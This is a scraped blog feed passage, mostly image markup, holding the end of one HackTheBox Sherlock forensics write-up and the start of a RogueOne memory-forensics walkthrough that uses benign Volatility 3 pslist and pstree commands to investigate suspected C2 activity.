type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!aZFc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png 424w, https://substackcdn.com/image/fetch/$s_!aZFc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png 848w, https://substackcdn.com/image/fetch/$s_!aZFc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png 1272w, https://substackcdn.com/image/fetch/$s_!aZFc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!aZFc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png" width="836" height="45" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:45,&quot;width&quot;:836,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:15510,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!aZFc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png 424w, https://substackcdn.com/image/fetch/$s_!aZFc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png 848w, https://substackcdn.com/image/fetch/$s_!aZFc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png 1272w, https://substackcdn.com/image/fetch/$s_!aZFc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sJuq!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sJuq!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png 424w, https://substackcdn.com/image/fetch/$s_!sJuq!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png 848w, https://substackcdn.com/image/fetch/$s_!sJuq!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png 1272w, https://substackcdn.com/image/fetch/$s_!sJuq!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sJuq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png" width="724" height="482" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/540f8016-389c-4d01-b66b-279ff133d44c_724x482.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:482,&quot;width&quot;:724,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sJuq!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png 424w, https://substackcdn.com/image/fetch/$s_!sJuq!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png 848w, https://substackcdn.com/image/fetch/$s_!sJuq!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png 1272w, https://substackcdn.com/image/fetch/$s_!sJuq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F540f8016-389c-4d01-b66b-279ff133d44c_724x482.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>14. To exfiltrate data from the victim's workstation, the binary executed a command. Can you provide the complete command used for this action?</strong></p><p><strong>Method:</strong></p><ul><li><p>In <strong>Timeline Explorer</strong>, search for: <br>winscp.exe</p></li><li><p>Locate the <strong>ParentCommandLine</strong> field in the <strong>Payload</strong> section to find the complete exfiltration command.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!QjYp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!QjYp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png 424w, https://substackcdn.com/image/fetch/$s_!QjYp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png 848w, https://substackcdn.com/image/fetch/$s_!QjYp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png 1272w, https://substackcdn.com/image/fetch/$s_!QjYp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!QjYp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png" width="1456" height="451" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:451,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!QjYp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png 424w, https://substackcdn.com/image/fetch/$s_!QjYp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png 848w, https://substackcdn.com/image/fetch/$s_!QjYp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png 1272w, https://substackcdn.com/image/fetch/$s_!QjYp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3befabac-ce76-4e4e-b459-27f54ae04c00_2554x791.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div>]]></content:encoded></item><item><title><![CDATA[HackTheBox: RogueOne]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hackthebox-rogueone</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-rogueone</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Wed, 08 Jan 2025 21:47:42 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!2Du6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Here's the revised write-up for the HackTheBox: RogueOne challenge without including the answers:</p><div><hr></div><h1><strong>HackTheBox: RogueOne Write-Up</strong></h1><p><strong>Scenario:</strong><br>Your SIEM system generated multiple alerts in less than a minute, indicating potential C2 communication from Simon Stark's workstation. Despite Simon not noticing anything unusual, the IT team had him share screenshots of his task manager to check for any unusual processes. No suspicious processes were found, yet alerts about C2 communications persisted. The SOC manager then directed the immediate containment of the workstation and a memory dump for analysis. As a memory forensics expert, you are tasked with assisting the SOC team at Forela to investigate and resolve this urgent incident.</p><div><hr></div><h2><strong>Task 1: Identify the Malicious Process and Confirm Process ID of Malicious Process</strong></h2><p><strong>Steps:</strong></p><ol><li><p>Extract the memory dump:</p></li></ol><pre><code><code>7z x RogueOne.zip
</code></code></pre><ol start="2"><li><p>Use <strong>Volatility 3</strong> to analyze the memory dump:</p></li></ol><pre><code><code>~/.local/bin/vol -f &lt;memory-file&gt; windows.pslist
</code></code></pre><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2Du6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2Du6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png 424w, https://substackcdn.com/image/fetch/$s_!2Du6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png 848w, https://substackcdn.com/image/fetch/$s_!2Du6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png 1272w, https://substackcdn.com/image/fetch/$s_!2Du6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2Du6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png" width="605" height="491" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:491,&quot;width&quot;:605,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:55693,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2Du6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png 424w, https://substackcdn.com/image/fetch/$s_!2Du6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png 848w, https://substackcdn.com/image/fetch/$s_!2Du6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png 1272w, https://substackcdn.com/image/fetch/$s_!2Du6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F324cf426-d3c0-417d-8445-a8ac609922c1_605x491.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!iGDX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!iGDX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png 424w, https://substackcdn.com/image/fetch/$s_!iGDX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png 848w, https://substackcdn.com/image/fetch/$s_!iGDX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png 1272w, https://substackcdn.com/image/fetch/$s_!iGDX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!iGDX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png" width="1227" height="451" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:451,&quot;width&quot;:1227,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:150275,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!iGDX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png 424w, https://substackcdn.com/image/fetch/$s_!iGDX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png 848w, https://substackcdn.com/image/fetch/$s_!iGDX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png 1272w, https://substackcdn.com/image/fetch/$s_!iGDX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffbfa51a1-f596-46ba-8878-101fb8ea3473_1227x451.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!X7Gp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!X7Gp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png 424w, https://substackcdn.com/image/fetch/$s_!X7Gp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png 848w, https://substackcdn.com/image/fetch/$s_!X7Gp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png 1272w, https://substackcdn.com/image/fetch/$s_!X7Gp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!X7Gp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png" width="1068" height="228" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:228,&quot;width&quot;:1068,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:97186,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!X7Gp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png 424w, https://substackcdn.com/image/fetch/$s_!X7Gp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png 848w, https://substackcdn.com/image/fetch/$s_!X7Gp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png 1272w, https://substackcdn.com/image/fetch/$s_!X7Gp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9263ba67-e130-4ded-9f13-4a5af46a151e_1068x228.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><h2><strong>Task 2: Identify the Child Process Spawned by the Malicious Process</strong></h2><p><strong>Steps:</strong></p><ol><li><p>Run the <strong>windows.pstree</strong> plugin to check the process tree:</p></li></ol><pre><code><code>~/.local/bin/vol -f &lt;memory-file&gt; windows.pstree
